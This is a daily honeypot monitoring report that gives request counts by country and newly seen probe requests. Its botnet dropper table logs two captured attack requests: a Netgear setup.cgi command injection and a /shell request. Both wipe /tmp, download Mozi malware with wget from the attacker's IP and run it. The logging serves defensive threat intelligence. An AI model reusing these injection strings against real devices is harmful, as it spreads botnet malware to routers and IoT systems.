Skip to main content
  1. Daily-Posts/

Report: 2025-06-27

·336 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-27
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 11 new requests that have never been observed before (these were added to the monitored request database.).

A total of 897 requests were recorded during the day, originating from 2 different countries, with a peak of 354 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
45.230.66.107GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.107:10786/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
219.68.210.56GET /shell?cd+/tmp;rm+-rf+*;wget+http://219.68.210.56:39295/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
712GET /xyzz.xyzz HTTP/1.1
811SSH-2.0-libssh_0.11.1
1231POST /getpage.gch?pid=101 HTTP/1.1
2011\x04\x01\x00P\xC4\xFBF\xEA\x00
2021CONNECT 196.251.70.234:80 HTTP/1.0
2311GET /odinhttpcall1750985145 HTTP/1.1
2321GET /OdinHttpCall1750985145 HTTP/1.1
2331GET /Odin/http/call1750985145 HTTP/1.1
2491GET /odinhttpcall1750993162 HTTP/1.1
2501GET /OdinHttpCall1750993162 HTTP/1.1
2511GET /Odin/http/call1750993162 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0354US
162DE
257GB
350HK
449BG
548TW
640NL
735JP
828CA
927SG
1016FR
1116GH
1213ZA
1312PL
1410DO
1510CN
169TR
176CH
186IL
195BR
204SC
214IN
224UA
233MC
243AR
253KZ
263BE
273VN
282PT
292RU
302IE
312RO
321ES
331BD
341KR
351ID
361SE
371MD
381TH
391IT
401AO

Related

Report: 2025-06-26
·457 words
Repport Daily
Report: 2025-06-25
·318 words
Repport Daily
Report: 2025-06-24
·327 words
Repport Daily